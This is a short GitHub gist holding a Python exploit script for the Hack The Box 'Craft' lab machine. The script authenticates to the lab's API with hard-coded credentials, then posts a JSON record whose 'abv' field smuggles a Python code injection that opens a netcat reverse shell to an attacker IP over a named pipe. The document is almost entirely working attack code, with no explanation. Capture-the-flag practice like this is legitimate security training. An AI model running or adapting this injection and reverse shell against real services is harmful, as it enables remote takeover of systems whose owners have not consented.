Skip to content

Instantly share code, notes, and snippets.

@ls4cfk
Created Dec 4, 2019
Embed
What would you like to do?
craft - hackthebox
#!/usr/bin/env python
import requests
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get("https://api.craft.htb/api/auth/login", auth=("dinesh", "4aUh0A8PbVJxgd"), verify=False)
json_response = json.loads(response.text)
token = json_response["token"]
headers = { "X-Craft-API-Token": token, "Content-Type": "application/json" }
response = requests.get("https://api.craft.htb/api/auth/check", headers=headers, verify=False)
brew_dict = {}
brew_dict["abv"] = "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.130 9999 >/tmp/f')"
brew_dict["name"] = "bullshit"
brew_dict["brewer"] = "bullshit"
brew_dict["style"] = "bullshit"
json_data = json.dumps(brew_dict)
response = requests.post("https://api.craft.htb/api/brew/", headers=headers, data=json_data, verify=False)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment